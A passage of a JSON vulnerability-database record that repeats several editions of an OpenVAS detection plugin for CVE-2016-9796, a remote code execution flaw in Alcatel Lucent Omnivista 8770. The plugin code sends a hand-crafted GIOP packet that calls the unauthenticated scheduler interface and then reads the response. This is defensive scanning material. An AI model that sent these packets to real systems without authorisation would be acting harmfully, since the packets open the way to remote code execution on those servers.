"Alcatel Lucent Omnivista 8770 - Remote Code Execution (windows)", "type": "openvas", "viewCount": 1}, "differentElements": ["description", "modified", "sourceData", "title"], "edition": 2, "lastseen": "2017-10-25T14:42:56"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-9796"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6bf069bbe6861620420160bbcd856ab58a35efac272af5ae4d486c517f603189", "hashmap": [{"hash": "fb634a5017b2a41a91c85626dded43f9", "key": "published"}, {"hash": "70cca94720f62109b82fe3d873b630b1", "key": "description"}, {"hash": "b50cff288596b473f692a61acc91c1d2", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "e92e9a00a213c6737b6176d2303efea7", "key": "sourceData"}, {"hash": "093f6fa86e4b143448c139412887dda8", "key": "cvelist"}, {"hash": "35b06cdf6e7f1387d88e10ea205c0816", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "18f7ae8aaceb897d726f1bf00abd32b1", "key": "pluginID"}, {"hash": "9b0c8a560ca98109588056dc2f5375b9", "key": "references"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "cc48873685a1db65f44dc4a65ac3d77f", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107112", "id": "OPENVAS:1361412562310107112", "lastseen": "2018-10-02T14:29:26", "modified": "2018-10-01T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310107112", "published": "2016-12-23T00:00:00", "references": ["http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html", "https://www.exploit-db.com/exploits/40862/"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 11702 2018-10-01 07:31:38Z asteins $\n#\n# Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alcatel-lucent:omnivista\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107112\");\n script_version(\"$Revision: 11702 $\");\n script_cve_id(\"CVE-2016-9796\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 09:31:38 +0200 (Mon, 01 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted giop packet request and check the response\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0\");\n\n script_tag(name:\"solution\", value:\"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue,\n which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_xref(name:\"URL\", value:\"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/40862/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_alcatel_luc_omnvista_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 30024);\n script_mandatory_keys(\"alc-luc-omnvista/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif ( ! Ver = get_app_version( cpe:CPE, port: port)) exit( 0 );\nif ( Ver != \"8770\" ) exit ( 0 );\ngiopport = 30024;\nif( ! get_port_state( giopport ) ) exit( 0 );\nsoc = open_sock_tcp( giopport );\nif( ! soc ) exit( 0 );\nreq = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65,\n0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74,\n0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a,\n0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,\n0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00,\n0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06,\n0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10,\n0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31,\n0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d,\n0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a,\n0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41,\n0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72,\n0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e,\n0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64,\n0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61,\n0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e,\n0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a,\n0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62,\n0x62, 0x00);\n\nsend( socket:soc, data:req );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nif( data !~ \"GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ\") exit ( 0 );\n\nreq2 = raw_string(\"0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,\n0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00,\n0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,\n0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00\");\n\nsend( socket:soc, data:req2 );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nclose( soc );\nif( data =~ \"GIOPGIOP\") {\n security_message( port:giopport);\n exit( 0 );\n}\n\nexit( 99 );\n", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)", "type": "openvas", "viewCount": 5}, "differentElements": ["modified", "sourceData"], "edition": 6, "lastseen": "2018-10-02T14:29:26"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-9796"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with Alcatel Lucent Omnivista 8770 and is prone to Remote Command Execution vulnerability.", "edition": 1, "enchantments": {}, "hash": "1d1bd78d2c3fe98fae61edc5ad00fc7286bc94045bad42e1c79ff9dfdb7694af", "hashmap": [{"hash": "fb634a5017b2a41a91c85626dded43f9", "key": "published"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "85c9f0711d4f065c7628d4fa6b5c296b", "key": "sourceData"}, {"hash": "093f6fa86e4b143448c139412887dda8", "key": "cvelist"}, {"hash": "bef5b94a942991fc8e55a261ea049521", "key": "modified"}, {"hash": "eecca42a8be8bed371b48a635243e1fc", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "18f7ae8aaceb897d726f1bf00abd32b1", "key": "pluginID"}, {"hash": "9b0c8a560ca98109588056dc2f5375b9", "key": "references"}, {"hash": "414ffb7a9ac291dfddc8cd6cac0b9b19", "key": "description"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "cc48873685a1db65f44dc4a65ac3d77f", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107112", "id": "OPENVAS:1361412562310107112", "lastseen": "2017-07-02T21:13:10", "modified": "2017-03-20T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310107112", "published": "2016-12-23T00:00:00", "references": ["http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html", "https://www.exploit-db.com/exploits/40862/"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 5616 2017-03-20 13:32:41Z cfi $\n#\n# Alcatel Lucent Omnivista 8770 - Remote Code Execution (windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alcatel-lucent:omnivista\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107112\");\n script_version(\"$Revision: 5616 $\");\n script_cve_id(\"CVE-2016-9796\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-20 14:32:41 +0100 (Mon, 20 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Alcatel Lucent Omnivista 8770 - Remote Code Execution (windows)\");\n\n script_tag(name: \"summary\" , value:\"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to Remote Command Execution vulnerability.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted giop packet request and check the response\");\n\n script_tag(name: \"insight\", value:\"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0\");\n\n script_tag(name: \"solution\" , value:\"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue, which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_xref(name : \"URL\" , value : \"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html\");\n script_xref(name : \"URL\" , value : \"https://www.exploit-db.com/exploits/40862/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_alcatel_luc_omnvista_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 30024);\n script_mandatory_keys(\"alc-luc-omnvista/installed\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( host_runs(\"Windows\") == \"no\" ) exit( 0 );\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif ( ! Ver = get_app_version( cpe:CPE, port: port)) exit( 0 );\nif ( Ver != \"8770\" ) exit ( 0 );\ngiopport = 30024;\nif( ! get_port_state( giopport ) ) exit( 0 );\nsoc = open_sock_tcp( giopport );\nif( ! soc ) exit( 0 );\n## Construct AddjobSet packet\nreq = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65, \n0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74, \n0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a, \n0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, \n0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00, \n0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06, \n0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10, \n0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31, \n0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d, \n0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a, \n0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41, \n0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, \n0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e, \n0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64, \n0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61, \n0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e, \n0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a, \n0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62, \n0x62, 0x00);\n\nsend( socket:soc, data:req );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nif( data !~ \"GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ\") exit ( 0 );\n\nreq2 = raw_string(\"0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, \n0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00, \n0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, \n0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00\");\n\nsend( socket:soc, data:req2 );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nclose( soc );\nif( data =~ \"GIOPGIOP\") {\n security_message( port:giopport);\n exit( 0 );\n}\n\nexit( 99 );\n", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution (windows)", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:13:10"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-9796"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "b77c1d12bf571b54366b42206ec6e6f42666b9360bfe1413004c848009df4acf", "hashmap": [{"hash": "fb634a5017b2a41a91c85626dded43f9", "key": "published"}, {"hash": "70cca94720f62109b82fe3d873b630b1", "key": "description"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3befccbd964ec41bf4da984f874d2bb5", "key": "sourceData"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "093f6fa86e4b143448c139412887dda8", "key": "cvelist"}, {"hash": "35b06cdf6e7f1387d88e10ea205c0816", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "18f7ae8aaceb897d726f1bf00abd32b1", "key": "pluginID"}, {"hash": "9b0c8a560ca98109588056dc2f5375b9", "key": "references"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "cc48873685a1db65f44dc4a65ac3d77f", "key": "href"}, {"hash": "1ebc96e5065a184c420d4bd937731299", "key": "modified"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107112", "id": "OPENVAS:1361412562310107112", "lastseen": "2018-09-01T23:47:40", "modified": "2018-04-25T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310107112", "published": "2016-12-23T00:00:00", "references": ["http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html", "https://www.exploit-db.com/exploits/40862/"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 9603 2018-04-25 10:35:13Z asteins $\n#\n# Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alcatel-lucent:omnivista\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107112\");\n script_version(\"$Revision: 9603 $\");\n script_cve_id(\"CVE-2016-9796\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-25 12:35:13 +0200 (Wed, 25 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted giop packet request and check the response\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0\");\n\n script_tag(name:\"solution\", value:\"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue,\n which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_xref(name:\"URL\", value:\"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/40862/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_alcatel_luc_omnvista_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 30024);\n script_mandatory_keys(\"alc-luc-omnvista/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif ( ! Ver = get_app_version( cpe:CPE, port: port)) exit( 0 );\nif ( Ver != \"8770\" ) exit ( 0 );\ngiopport = 30024;\nif( ! get_port_state( giopport ) ) exit( 0 );\nsoc = open_sock_tcp( giopport );\nif( ! soc ) exit( 0 );\n## Construct AddjobSet packet\nreq = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65,\n0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74,\n0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a,\n0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,\n0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00,\n0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06,\n0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10,\n0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31,\n0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d,\n0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a,\n0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41,\n0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72,\n0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e,\n0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64,\n0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61,\n0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e,\n0x6d, 0x63, 